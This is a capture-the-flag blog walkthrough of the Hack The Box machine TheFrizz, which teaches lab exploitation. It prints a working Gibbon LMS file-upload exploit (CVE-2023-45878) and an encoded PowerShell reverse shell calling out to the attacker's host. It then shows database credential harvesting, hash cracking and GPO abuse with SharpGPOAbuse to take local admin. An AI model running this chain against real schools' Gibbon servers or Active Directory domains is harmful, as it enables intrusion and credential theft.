Hackthebox: TheFrizz

Foued SAIDI Lv4
  2025-08-20 22:45:24 2025-08-20 22:45:24 Created   2025-08-20 23:34:18 2025-08-20 23:34:18 Updated    

Overview

TheFrizz is a medium-difficulty machine from Hack The Box dealing initially with CVE-2023-45878 which is an unauthenticated file upload that leads to RCE. Then with some credentials exfiltration we’ll get to the next user where we’ll extract once again some credentials from their recycle bin to eventually exploit some misconfigured GPO links to get local admin.

TheFrizz-info-card
TheFrizz-info-card

Reconnaissance

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-08-21 02:25:00Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022 (88%)
OS CPE: cpe:/o:microsoft:windows_server_2022
Aggressive OS guesses: Microsoft Windows Server 2022 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-08-21T02:25:59
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 6h35m12s

We can see this is an Active Directory Domain Controller due to the existence of kerberos port 88. Let’s go ahead and add an entry for frizz.htb and frizzdc.frizz.htb on our /etc/hosts file.

Web Application - http://frizzdc.frizz.htb

Going on to the Web app, it seems to have a couple interesting functions like staff login:

Web Application
Web Application

Looking a bit down, we can notice the use of the Gibbon v25.0.00 CMS

Doing some googling, I stumbled upon this CVE for Gibbon v25.0.00 which is unauthenticated file upload leading to RCE.

You can find the PoC below where we first craft a php reverse shell and then run our exploit:

1
2
3
4
5
6
7
8
9
┌──(kali㉿kali)-[~]
└─$ cat shell.php 
<?php echo system('powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AOAA1ACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==')?>


┌──(kali㉿kali)-[~]
└─$ curl -X POST http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php -d "img=image/png;shell,$(cat shell.php | base64 -w0)" -d 'path=shell.php' -d 'gibbonPersonID=0000000001' &&  curl http://frizzdc.frizz.htb/Gibbon-LMS/shell.php &
shell.php[1] 16075

And we get our callback:

1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.85] from (UNKNOWN) [10.10.11.60] 54349

PS C:\xampp\htdocs\Gibbon-LMS> whoami
frizz\w.webservice
PS C:\xampp\htdocs\Gibbon-LMS>

Now as usual, the first thing to do is database credentials harvesting, and indeed we do find creds:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
PS C:\xampp\htdocs\Gibbon-LMS> cat config.php
<?php
/*
Gibbon, Flexible & Open School System
Copyright (C) 2010, Ross Parker

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program.  If not, see <http://www.gnu.org/licenses/>.
*/

/**
 * Sets the database connection information.
 * You can supply an optional $databasePort if your server requires one.
 */
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';

/**
 * Sets a globally unique id, to allow multiple installs on a single server.
 */
$guid = '7y59n5xz-uym-ei9p-7mmq-83vifmtyey2';

/**
 * Sets system-wide caching factor, used to balance performance and freshness.
 * Value represents number of page loads between cache refresh.
 * Must be positive integer. 1 means no caching.
 */
$caching = 10;
PS C:\xampp\htdocs\Gibbon-LMS>

We can now use these creds to query other creds from the mysql database:

1
2
3
4
PS C:\xampp\htdocs\Gibbon-LMS> C:\xampp\mysql\bin\mysql.exe -u MrGibbonsDB -p'MisterGibbs!Parrot!?1' --database=gibbon -e "select username, passwordStrong,passwordStrongSalt from gibbonPerson;"
username        passwordStrong  passwordStrongSalt
f.frizzle       067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03    /aACFhikmNopqrRTVz2489
PS C:\xampp\htdocs\Gibbon-LMS>

We can now attemt to crack this password using Hashcat mode 1420 and rockyou, and we do get a hit:

1
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489:Jenni_Luvs_Magic23

Now we can use ssh to get into the box with this user:

1
2
3
impacket-getTGT frizz.htb/f.frizzle:'Jenni_Luvs_Magic23' -dc-ip frizzdc.frizz.htb
export KRB5CCNAME=f.frizzle.ccache
ssh [email protected] -K

A usual, we hunt for creds. We can find some interesting stuff on the user’s recycle bin:

1
2
3
4
5
6
7
8
9
10
11
12
13
PS C:\Users\f.frizzle> ls 'C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103'

    Directory: C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a---          10/29/2024  7:31 AM            148 $IE2XMEG.7z
-a---          10/24/2024  9:16 PM       30416987 $RE2XMEG.7z

PS C:\Users\f.frizzle>


└─$ scp [email protected]:c:/users/f.frizzle/stuff.7z .

Looking into that file, we find some base64 credentials for M.Schoolbus:

1
2
3
┌──(kali㉿kali)-[~/Desktop/wapt/conf]
└─$ echo 'IXN1QmNpZ0BNZWhUZWQhUgo=' | base64 -d                     
!suBcig@MehTed!R

Now we ssh again as that user.

Hint: This new user has a bunch of abilities, but only one directly applies to the DC:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
PS C:\Users\M.SchoolBus> get-domain

Forest                  : frizz.htb
DomainControllers       : {frizzdc.frizz.htb}
Children                : {}
DomainMode              : Unknown
DomainModeLevel         : 7
Parent                  : 
PdcRoleOwner            : frizzdc.frizz.htb
RidRoleOwner            : frizzdc.frizz.htb
InfrastructureRoleOwner : frizzdc.frizz.htb
Name                    : frizz.htb

PS C:\Users\M.SchoolBus> Get-DomainOU | select name, gplink

name               gplink
----               ------
Domain Controllers [LDAP://CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=frizz,DC=htb;0]
Class_Frizz

We can use privs to create a new GPO and then link it to the OU:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
PS C:\Users\M.SchoolBus> New-GPO -Name kujen | New-GPLink -Target "OU=DOMAIN CONTROLLERS,DC=FRIZZ,DC=HTB" -LinkEnabled Yes

GpoId       : 3b236518-30ed-4ea2-821b-90b0f32d1be7
DisplayName : kujen
Enabled     : True
Enforced    : False
Target      : OU=Domain Controllers,DC=frizz,DC=htb
Order       : 2

PS C:\Users\M.SchoolBus> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName kujen
[+] Domain = frizz.htb
[+] Domain Controller = frizzdc.frizz.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=frizz,DC=htb
[+] SID Value of M.SchoolBus = S-1-5-21-2386970044-1145388522-2932701813-1106
[+] GUID of "kujen" is: {3B236518-30ED-4EA2-821B-90B0F32D1BE7}
[+] Creating file \\frizz.htb\SysVol\frizz.htb\Policies\{3B236518-30ED-4EA2-821B-90B0F32D1BE7}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
PS C:\Users\M.SchoolBus> gpupdate /force
Updating policy...



Computer Policy update has completed successfully.

User Policy update has completed successfully.



PS C:\Users\M.SchoolBus> net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
M.SchoolBus
The command completed successfully.

And we are local admin now!

Lets get our flags:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
                                                                                                                                                                                                     
┌──(kali㉿kali)-[~/Desktop/wapt/conf]
└─$ smbclient  //frizzdc.frizz.htb/C$ -U M.SchoolBus -p '!suBcig@MehTed!R'
Password for [WORKGROUP\M.SchoolBus]:
                                                                                                                                                                                                     
┌──(kali㉿kali)-[~/Desktop/wapt/conf]
└─$ smbclient  //frizzdc.frizz.htb/C$ -U M.SchoolBus                      
Password for [WORKGROUP\M.SchoolBus]:
Try "help" to get a list of possible commands.
smb: \> ls
  $RECYCLE.BIN                      DHS        0  Tue Oct 29 14:31:09 2024
  $WinREAgent                        DH        0  Mon Mar 10 22:31:22 2025
  Config.Msi                        DHS        0  Thu Feb 20 22:51:26 2025
  Documents and Settings          DHSrn        0  Tue Oct 29 16:12:57 2024
  DumpStack.log.tmp                 AHS    12288  Tue Oct 29 15:27:08 2024
  inetpub                             D        0  Mon Mar 10 22:39:34 2025
  PerfLogs                            D        0  Sat May  8 08:15:05 2021
  Program Files                      DR        0  Wed Feb 26 16:13:49 2025
  Program Files (x86)                 D        0  Sat May  8 09:34:13 2021
  ProgramData                       DHn        0  Thu Feb 20 22:50:40 2025
  Recovery                         DHSn        0  Tue Oct 29 16:12:59 2024
  System Volume Information         DHS        0  Tue Oct 29 14:25:07 2024
  Users                              DR        0  Tue Oct 29 14:31:03 2024
  Windows                             D        0  Mon Mar 10 22:41:41 2025
  xampp                               D        0  Tue Oct 29 14:28:30 2024

                3769343 blocks of size 4096. 366469 blocks available
smb: \> cd users
smb: \users\> ls
  .                                  DR        0  Tue Oct 29 14:31:03 2024
  ..                                DHS        0  Mon Mar 10 22:39:34 2025
  Administrator                       D        0  Tue Mar 11 22:37:09 2025
  All Users                       DHSrn        0  Sat May  8 08:26:16 2021
  Default                           DHR        0  Tue Oct 29 16:12:57 2024
  Default User                    DHSrn        0  Sat May  8 08:26:16 2021
  desktop.ini                       AHS      174  Sat May  8 08:14:03 2021
  f.frizzle                           D        0  Sat Mar 22 18:24:37 2025
  M.SchoolBus                         D        0  Sat Mar 22 19:04:40 2025
  Public                             DR        0  Tue Oct 29 14:13:24 2024
  v.frizzle                           D        0  Wed Feb 19 21:35:08 2025
  w.Webservice                        D        0  Wed Feb 19 21:35:08 2025

                3769343 blocks of size 4096. 366469 blocks available
smb: \users\> cd administrator
smb: \users\administrator\> ls
  .                                   D        0  Tue Mar 11 22:37:09 2025
  ..                                 DR        0  Tue Oct 29 14:31:03 2024
  3D Objects                         DR        0  Tue Oct 29 14:13:24 2024
  AppData                            DH        0  Fri Mar 21 22:26:23 2025
  Application Data                DHSrn        0  Tue Oct 29 14:13:18 2024
  Contacts                           DR        0  Tue Oct 29 14:13:24 2024
  Cookies                         DHSrn        0  Tue Oct 29 14:13:18 2024
  Desktop                            DR        0  Wed Feb 26 21:53:05 2025
  Documents                          DR        0  Wed Feb 26 16:13:49 2025
  Downloads                          DR        0  Tue Oct 29 14:13:24 2024
  Favorites                          DR        0  Tue Oct 29 14:13:24 2024
  Links                              DR        0  Tue Oct 29 14:13:24 2024
  Local Settings                  DHSrn        0  Tue Oct 29 14:13:18 2024
  Music                              DR        0  Tue Oct 29 14:13:24 2024
  My Documents                    DHSrn        0  Tue Oct 29 14:13:18 2024
  NetHood                         DHSrn        0  Tue Oct 29 14:13:18 2024
  NTUSER.DAT                        AHn   262144  Fri Mar 21 22:26:29 2025
  ntuser.dat.LOG1                   AHS        0  Tue Oct 29 14:13:18 2024
  ntuser.dat.LOG2                   AHS    99328  Tue Oct 29 14:13:18 2024
  NTUSER.DAT{a220b2e4-9610-11ef-9ff5-0800273d0e9f}.TM.blf    AHS    65536  Tue Oct 29 14:13:18 2024
  NTUSER.DAT{a220b2e4-9610-11ef-9ff5-0800273d0e9f}.TMContainer00000000000000000001.regtrans-ms    AHS   524288  Tue Oct 29 14:13:18 2024
  NTUSER.DAT{a220b2e4-9610-11ef-9ff5-0800273d0e9f}.TMContainer00000000000000000002.regtrans-ms    AHS   524288  Tue Oct 29 14:13:18 2024
  ntuser.ini                         HS       20  Tue Oct 29 14:13:18 2024
  Pictures                           DR        0  Tue Oct 29 14:13:24 2024
  Recent                          DHSrn        0  Tue Oct 29 14:13:18 2024
  Saved Games                        DR        0  Tue Oct 29 14:13:24 2024
  Searches                           DR        0  Tue Oct 29 14:13:24 2024
  SendTo                          DHSrn        0  Tue Oct 29 14:13:18 2024
  Start Menu                      DHSrn        0  Tue Oct 29 14:13:18 2024
  Templates                       DHSrn        0  Tue Oct 29 14:13:18 2024
  Videos                             DR        0  Tue Oct 29 14:13:24 2024
cd
                3769343 blocks of size 4096. 366469 blocks available
smb: \users\administrator\> cd desktop
smb: \users\administrator\desktop\> ls
  .                                  DR        0  Tue Mar 11 23:14:03 2025
  ..                                  D        0  Tue Mar 11 22:37:09 2025
  cleanup.ps1                         A     2083  Tue Feb 25 22:06:47 2025
  desktop.ini                       AHS      282  Tue Oct 29 14:13:24 2024
  root.txt                           AR       34  Fri Mar 21 22:26:26 2025

                3769343 blocks of size 4096. 366469 blocks available
smb: \users\administrator\desktop\> cat root.txt
cat: command not found
smb: \users\administrator\desktop\> get root.txt
getting file \users\administrator\desktop\root.txt of size 34 as root.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \users\administrator\desktop\> exit
                                                                                                                                                                                                     
┌──(kali㉿kali)-[~/Desktop/wapt/conf]
└─$ cat root.txt                             
d675dc327c0a22d4c5f82b5c378276bd

That was it for TheFrizz, I hope you learned something new!
-0xkujen

  • Title: Hackthebox: TheFrizz
  • Author: Foued SAIDI
  • Created at : 2025-08-20 22:45:24
  • Updated at : 2025-08-20 23:34:18
  • Link: https://kujen5.github.io/2025/08/20/Hackthebox-TheFrizz/
  • License: This work is licensed under CC BY-NC-SA 4.0.
On this page
Hackthebox: TheFrizz
  1. Overview
  2. Reconnaissance
  3. Web Application - http://frizzdc.frizz.htb